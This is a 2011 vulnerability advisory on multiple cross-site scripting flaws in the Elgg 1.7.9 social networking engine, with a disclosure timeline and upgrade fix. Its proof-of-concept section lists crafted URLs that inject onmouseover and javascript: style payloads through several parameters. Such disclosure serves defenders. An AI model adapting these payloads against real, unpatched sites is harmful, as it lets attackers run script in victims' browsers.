Saturday, July 30, 2011

Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities

1. OVERVIEW

The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross Site Scripting.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications. Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

Several parameters (page_owner, content,internalname, QUERY_STRING) are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 


4. VERSIONS AFFECTED

Elgg 1.7.9 <= 


5. PROOF-OF-CONCEPT/EXPLOIT


XSS (Browser All)

N.B. User login is required to execute.

vulnerable parameters: page_owner, content,internalname, QUERY_STRING

REQUEST:

http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22


XSS (Exploitable in Older versions of Browsers - IE/FF)
vulnerable parameters: send_to,container_guid
=====================================================

REQUEST:

http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s


Portion of RESPONSE:

	


REQUEST:

http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22


Portion of RESPONSE:

	



6. SOLUTION

Upgrade to 1.7.10 or higher.


7. VENDOR

Curverider Ltd 
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: vulnerability reported
2011-06-14: vendor released fixed version
2011-07-30: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting
Project Home: http://elgg.org/
Vendor Release Note: http://community.elgg.org/pg/forum/topic/734872/elgg-blog-elgg-1710-released/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS) 
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-07-30]